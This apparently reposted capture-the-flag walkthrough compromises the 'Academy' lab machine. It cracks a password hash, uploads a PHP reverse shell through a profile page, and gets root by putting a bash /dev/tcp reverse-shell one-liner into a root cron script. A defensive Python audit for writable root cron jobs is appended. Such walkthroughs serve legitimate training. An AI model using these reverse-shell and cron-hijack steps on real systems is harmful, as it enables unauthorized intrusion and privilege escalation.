Info@NationalCyberSecurity

Hacking Academy. Machine: Academy | by Rahul Ravishankar | Jan, 2024 | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #hacker


We can use FTP to get the note.txt file but we don’t know where the file is located

We can then go ahead and check out what the note.txt file says

In the note.txt file, we see a database that contains a username and password; however, the password looks to be hashed

We can identify what type of hash it is by using a tool in Kali called “hash-identifier”

We can use “hashcat” to crack the hash or we can use an online hash cracker

We can look for directories on a web page using these 2 tools

From those results, we can see that there is a directory named “academy” where we can use the credentials that were given to us in the note.txt file

We can navigate through the academy and identify that we can upload a reverse shell in the following section of the website: “http://192.168.244.133/academy/my-profile.php”

https://github.com/pentestmonkey/php-reverse-shell

Before we upload the code we need to set up a listener using the following command

nc -nvlp 1234

We can then upload the code that is stored in a file and gain a shell, but we are not an admin on the machine

This is where we need to use privilege escalation to get root access, and we can use “linPEAS” to look for any points of privilege escalation

https://github.com/carlospolop/PEASS-ng

We will first host a web server

Going back to our shell, we will get the linpeas.sh file and change its permissions so we can execute it

From running “linpeas” we were able to identify 2 key pieces of information

Since we know that “grimmie” is a user on the machine and we have the password, we can try logging into the account

We can see that there is a file named “backup.sh”, which seems to be a cron job, and we can check whether that process is running using the tool “pspy”

Since we know that the process is running every minute, we will use it in our favor to open up a reverse shell by putting the “Bash One Liner” into the “backup.sh” file

Reverse Shell Cheat Sheet

bash -i >& /dev/tcp/192.168.244.128/8080 0>&1

We can open up a listener and wait for the process to execute, since it executes as root
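
The escalation works because a script that cron runs as root can be edited by a non-root account. The following audit is an added example, not part of the original write-up: it reads /etc/crontab-style text and reports root jobs whose script, or the directory holding it, is writable by an untrusted account. The function names, file paths and cron lines are constructed for illustration.

```python
import os, stat, tempfile

def untrusted_write(path, trusted_uids):
    """Return a reason if an account outside trusted_uids can modify path, else None."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return f"{path} is owned by uid {st.st_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"{path} is group/world-writable ({stat.filemode(st.st_mode)})"
    return None

def audit_root_cron(text, trusted_uids=frozenset({0})):
    """Check /etc/crontab-style text (user field present) for root jobs whose
    script, or the directory holding it, can be changed by a non-root account."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot user cmd" or "m h dom mon dow user cmd"; VAR=value lines fall out
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)[4:]
        if len(parts) < 3 or parts[1] != "root":
            continue
        for token in parts[2].split():
            if token.startswith("/") and os.path.isfile(token):
                # Only the file and its directory are checked; a full audit walks every ancestor.
                for target in (token, os.path.dirname(token)):
                    reason = untrusted_write(target, trusted_uids)
                    if reason:
                        findings.append((token, reason))
    return findings

def demo():
    """Constructed sample: a temp dir stands in for the host; paths and cron lines are made up."""
    d = tempfile.mkdtemp()
    weak, safe = os.path.join(d, "backup.sh"), os.path.join(d, "rotate.sh")
    for path, mode in ((weak, 0o777), (safe, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    crontab = (f"PATH=/usr/bin:/bin\n* * * * * root {weak}\n"
               f"*/5 * * * * root {safe}\n* * * * * www-data {weak}\n")
    # The demo trusts the current uid so it behaves the same without root privileges.
    return weak, audit_root_cron(crontab, trusted_uids={0, os.getuid()})

if __name__ == "__main__":
    for script, reason in demo()[1]:
        print(f"root cron job runs {script}: {reason}")
```

On a real host, pass the contents of /etc/crontab and the files under /etc/cron.d with the default trusted_uids, so that any script not owned by root is reported.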
